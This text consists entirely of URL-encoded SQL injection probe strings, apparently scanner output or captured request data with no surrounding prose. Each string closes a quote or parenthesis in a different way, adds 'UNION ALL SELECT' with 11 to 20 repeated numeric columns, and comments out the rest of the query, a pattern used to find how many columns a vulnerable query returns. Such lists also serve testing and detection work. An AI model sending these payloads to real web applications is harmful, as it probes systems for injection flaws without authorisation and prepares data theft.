-2903%29%20UNION%20ALL%20SELECT%206008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008%2C6008--%20 -8405%29%20UNION%20ALL%20SELECT%201373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373%2C1373--%20 -3252%29%20UNION%20ALL%20SELECT%209903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903%2C9903--%20 -4064%29%20UNION%20ALL%20SELECT%204420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420%2C4420--%20 -1496%29%20UNION%20ALL%20SELECT%209310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310%2C9310--%20 -9638%29%20UNION%20ALL%20SELECT%201265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265%2C1265--%20 -9678%29%29%20UNION%20ALL%20SELECT%207722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722--%20 -8040%29%29%20UNION%20ALL%20SELECT%207833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833%2C7833--%20 -7109%29%29%20UNION%20ALL%20SELECT%202425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425%2C2425--%20 -7955%29%29%20UNION%20ALL%20SELECT%208271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271%2C8271--%20 -6562%29%29%20UNION%20ALL%20SELECT%208554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554%2C8554--%20 -1243%29%29%20UNION%20ALL%20SELECT%205241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241%2C5241--%20 -7033%29%29%20UNION%20ALL%20SELECT%203912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912%2C3912--%20 -4631%29%29%20UNION%20ALL%20SELECT%205063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063--%20 -5285%29%29%20UNION%20ALL%20SELECT%203107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107%2C3107--%20 -1201%29%29%20UNION%20ALL%20SELECT%206514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514%2C6514--%20 -8283%29%29%29%20UNION%20ALL%20SELECT%207489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489%2C7489--%20 -2722%29%29%29%20UNION%20ALL%20SELECT%203771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771%2C3771--%20 -9618%29%29%29%20UNION%20ALL%20SELECT%209189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189%2C9189--%20 -3912%29%29%29%20UNION%20ALL%20SELECT%205660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660%2C5660--%20 -9891%29%29%29%20UNION%20ALL%20SELECT%205698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698%2C5698--%20 -2550%29%29%29%20UNION%20ALL%20SELECT%209512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512%2C9512--%20 -3010%29%29%29%20UNION%20ALL%20SELECT%207660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660%2C7660--%20 -8330%29%29%29%20UNION%20ALL%20SELECT%202626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626%2C2626--%20 -4763%29%29%29%20UNION%20ALL%20SELECT%202788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788%2C2788--%20 -9442%29%29%29%20UNION%20ALL%20SELECT%206139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139%2C6139--%20 -2334%20UNION%20ALL%20SELECT%202999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999%2C2999--%20 -3221%20UNION%20ALL%20SELECT%209074%2C9074%2C9074%2C9074%2C9074%2C9074%2C9074%2C9074%2C9074%2C9074%2C9074%2C9074--%20 -5164%20UNION%20ALL%20SELECT%208953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953%2C8953--%20 -2602%20UNION%20ALL%20SELECT%207052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052%2C7052--%20 -7353%20UNION%20ALL%20SELECT%201383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383%2C1383--%20 -8781%20UNION%20ALL%20SELECT%202807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807%2C2807--%20 -7437%20UNION%20ALL%20SELECT%202699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699%2C2699--%20 -5798%20UNION%20ALL%20SELECT%208392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392%2C8392--%20 -8623%20UNION%20ALL%20SELECT%202638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638%2C2638--%20 -5014%20UNION%20ALL%20SELECT%202414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414%2C2414--%20 -1751%29%20WHERE%209674%3D9674%20UNION%20ALL%20SELECT%209674%2C9674%2C9674%2C9674%2C9674%2C9674%2C9674%2C9674%2C9674%2C9674%2C9674--%20 -1096%29%20WHERE%207331%3D7331%20UNION%20ALL%20SELECT%207331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331%2C7331--%20 -7853%29%20WHERE%202894%3D2894%20UNION%20ALL%20SELECT%202894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894%2C2894--%20 -8508%29%20WHERE%206635%3D6635%20UNION%20ALL%20SELECT%206635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635%2C6635--%20 -2970%29%20WHERE%206052%3D6052%20UNION%20ALL%20SELECT%206052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052--%20 -3826%29%20WHERE%203914%3D3914%20UNION%20ALL%20SELECT%203914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914%2C3914--%20 -8074%29%20WHERE%208374%3D8374%20UNION%20ALL%20SELECT%208374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374%2C8374--%20 -7970%29%20WHERE%205275%3D5275%20UNION%20ALL%20SELECT%205275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275%2C5275--%20 -8722%29%20WHERE%205611%3D5611%20UNION%20ALL%20SELECT%205611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611%2C5611--%20 -9399%29%20WHERE%208061%3D8061%20UNION%20ALL%20SELECT%208061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061%2C8061--%20 -8017%20WHERE%204200%3D4200%20UNION%20ALL%20SELECT%204200%2C4200%2C4200%2C4200%2C4200%2C4200%2C4200%2C4200%2C4200%2C4200%2C4200--%20 -7257%20WHERE%201624%3D1624%20UNION%20ALL%20SELECT%201624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624%2C1624--%20 -1405%20WHERE%209532%3D9532%20UNION%20ALL%20SELECT%209532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532%2C9532--%20 -8419%20WHERE%207308%3D7308%20UNION%20ALL%20SELECT%207308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308%2C7308--%20 -4729%20WHERE%206660%3D6660%20UNION%20ALL%20SELECT%206660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660%2C6660--%20 -3142%20WHERE%205744%3D5744%20UNION%20ALL%20SELECT%205744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744%2C5744--%20 -2081%20WHERE%201922%3D1922%20UNION%20ALL%20SELECT%201922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922%2C1922--%20 -3088%20WHERE%208272%3D8272%20UNION%20ALL%20SELECT%208272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272%2C8272--%20 -8146%20WHERE%207154%3D7154%20UNION%20ALL%20SELECT%207154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154%2C7154--%20 -2259%20WHERE%201353%3D1353%20UNION%20ALL%20SELECT%201353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353%2C1353--%20 -7392%27%29%20UNION%20ALL%20SELECT%204709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709%2C4709--%20 -2306%27%29%20UNION%20ALL%20SELECT%206247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247%2C6247--%20 -8250%27%29%20UNION%20ALL%20SELECT%202866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866%2C2866--%20 -8989%27%29%20UNION%20ALL%20SELECT%205600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600--%20 -5592%27%29%20UNION%20ALL%20SELECT%201634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634%2C1634--%20 -8820%27%29%20UNION%20ALL%20SELECT%202860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860%2C2860--%20 -9798%27%29%20UNION%20ALL%20SELECT%202697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697%2C2697--%20 -5469%27%29%20UNION%20ALL%20SELECT%209182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182%2C9182--%20 -1767%27%29%20UNION%20ALL%20SELECT%205543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543%2C5543--%20 -3210%27%29%20UNION%20ALL%20SELECT%209478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478%2C9478--%20 -4196%27%20UNION%20ALL%20SELECT%201851%2C1851%2C1851%2C1851%2C1851%2C1851%2C1851%2C1851%2C1851%2C1851%2C1851--%20 -6325%27%20UNION%20ALL%20SELECT%207908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908%2C7908--%20 -4947%27%20UNION%20ALL%20SELECT%203565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565%2C3565--%20 -2868%27%20UNION%20ALL%20SELECT%203181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181%2C3181--%20 -2511%27%20UNION%20ALL%20SELECT%208998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998%2C8998--%20 -7928%27%20UNION%20ALL%20SELECT%201927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927--%20 -2853%27%20UNION%20ALL%20SELECT%201885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885%2C1885--%20 -8498%27%20UNION%20ALL%20SELECT%202823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823%2C2823--%20 -1047%27%20UNION%20ALL%20SELECT%209097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097%2C9097--%20 -6384%27%20UNION%20ALL%20SELECT%202392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392%2C2392--%20 -2641%22%20UNION%20ALL%20SELECT%205020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020--%20 -4988%22%20UNION%20ALL%20SELECT%201171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171%2C1171--%20 -5920%22%20UNION%20ALL%20SELECT%203700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700%2C3700--%20 -2122%22%20UNION%20ALL%20SELECT%209716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716%2C9716--%20 -5463%22%20UNION%20ALL%20SELECT%207006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006%2C7006--%20 -9863%22%20UNION%20ALL%20SELECT%209744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744--%20 -2672%22%20UNION%20ALL%20SELECT%204921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921%2C4921--%20 -6766%22%20UNION%20ALL%20SELECT%202141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141%2C2141--%20 -7489%22%20UNION%20ALL%20SELECT%209554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554%2C9554--%20 -1971%22%20UNION%20ALL%20SELECT%202586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586%2C2586--%20 -2290%27%29%20UNION%20ALL%20SELECT%203699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699%2C3699--%20 -6443%27%29%20UNION%20ALL%20SELECT%208678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678%2C8678--%20 -4675%27%29%20UNION%20ALL%20SELECT%204616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616%2C4616--%20 -7278%27%29%20UNION%20ALL%20SELECT%206939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939%2C6939--%20 -5886%27%29%20UNION%20ALL%20SELECT%201563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563%2C1563--%20 -2938%27%29%20UNION%20ALL%20SELECT%202669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669--%20 -6000%27%29%20UNION%20ALL%20SELECT%203915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915%2C3915--%20 -9518%27%29%20UNION%20ALL%20SELECT%201447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447%2C1447--%20 -4265%27%29%20UNION%20ALL%20SELECT%203106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106%2C3106--%20 -3070%27%29%20UNION%20ALL%20SELECT%205934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934%2C5934--%20 -7398%27%29%29%20UNION%20ALL%20SELECT%207116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116--%20 -3055%27%29%29%20UNION%20ALL%20SELECT%207890%2C7890%2C7890%2C7890%2C7890%2C7890%2C7890%2C7890%2C7890%2C7890%2C7890%2C7890--%20 -4501%27%29%29%20UNION%20ALL%20SELECT%204207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207%2C4207--%20 -9315%27%29%29%20UNION%20ALL%20SELECT%208390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390%2C8390--%20 -3317%27%29%29%20UNION%20ALL%20SELECT%207329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329%2C7329--%20 -3977%27%29%29%20UNION%20ALL%20SELECT%208246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246%2C8246--%20 -2947%27%29%29%20UNION%20ALL%20SELECT%207968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968%2C7968--%20 -9259%27%29%29%20UNION%20ALL%20SELECT%208436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436--%20 -7456%27%29%29%20UNION%20ALL%20SELECT%201976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976%2C1976--%20 -8621%27%29%29%20UNION%20ALL%20SELECT%209243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243%2C9243--%20 -1744%27%29%29%29%20UNION%20ALL%20SELECT%204159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159%2C4159--%20 -9875%27%29%29%29%20UNION%20ALL%20SELECT%201621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621--%20 -2072%27%29%29%29%20UNION%20ALL%20SELECT%206242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242%2C6242--%20 -5671%27%29%29%29%20UNION%20ALL%20SELECT%203789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789%2C3789--%20 -2183%27%29%29%29%20UNION%20ALL%20SELECT%209590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590%2C9590--%20 -3947%27%29%29%29%20UNION%20ALL%20SELECT%209518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518--%20 -3263%27%29%29%29%20UNION%20ALL%20SELECT%202367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367%2C2367--%20 -8772%27%29%29%29%20UNION%20ALL%20SELECT%203390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390%2C3390--%20 -9616%27%29%29%29%20UNION%20ALL%20SELECT%204986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986%2C4986--%20 -1877%27%29%29%29%20UNION%20ALL%20SELECT%206279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279%2C6279--%20 -2597%27%20UNION%20ALL%20SELECT%204789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789%2C4789--%20 -5705%27%20UNION%20ALL%20SELECT%202913%2C2913%2C2913%2C2913%2C2913%2C2913%2C2913%2C2913%2C2913%2C2913%2C2913%2C2913--%20 -3304%27%20UNION%20ALL%20SELECT%201023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023%2C1023--%20 -8205%27%20UNION%20ALL%20SELECT%203674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674%2C3674--%20 -3336%27%20UNION%20ALL%20SELECT%202310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310%2C2310--%20 -4776%27%20UNION%20ALL%20SELECT%202649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649%2C2649--%20 -7222%27%20UNION%20ALL%20SELECT%205063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063%2C5063--%20 -5485%27%20UNION%20ALL%20SELECT%208769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769%2C8769--%20 -9598%27%20UNION%20ALL%20SELECT%209773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773%2C9773--%20 -5160%27%20UNION%20ALL%20SELECT%205890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890--%20 -1729%27%29%20UNION%20ALL%20SELECT%209116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116%2C9116--%20 -2822%27%29%20UNION%20ALL%20SELECT%205697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697%2C5697--%20 -3510%27%29%20UNION%20ALL%20SELECT%206230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230%2C6230--%20 -3899%27%29%20UNION%20ALL%20SELECT%203173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173%2C3173--%20 -1729%27%29%20UNION%20ALL%20SELECT%206618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618%2C6618--%20 -5127%27%29%20UNION%20ALL%20SELECT%203859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859%2C3859--%20 -6933%27%29%20UNION%20ALL%20SELECT%202885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885%2C2885--%20 -9145%27%29%20UNION%20ALL%20SELECT%209137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137%2C9137--%20 -1334%27%29%20UNION%20ALL%20SELECT%204893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893%2C4893--%20 -6700%27%29%20UNION%20ALL%20SELECT%206862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862%2C6862--%20 -5494%27%29%29%20UNION%20ALL%20SELECT%205807%2C5807%2C5807%2C5807%2C5807%2C5807%2C5807%2C5807%2C5807%2C5807%2C5807--%20 -4366%27%29%29%20UNION%20ALL%20SELECT%206566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566%2C6566--%20 -9448%27%29%29%20UNION%20ALL%20SELECT%202155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155%2C2155--%20 -6374%27%29%29%20UNION%20ALL%20SELECT%207049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049%2C7049--%20 -5254%27%29%29%20UNION%20ALL%20SELECT%201966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966%2C1966--%20 -1621%27%29%29%20UNION%20ALL%20SELECT%202766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766%2C2766--%20 -8736%27%29%29%20UNION%20ALL%20SELECT%209227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227%2C9227--%20 -7812%27%29%29%20UNION%20ALL%20SELECT%207712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712%2C7712--%20 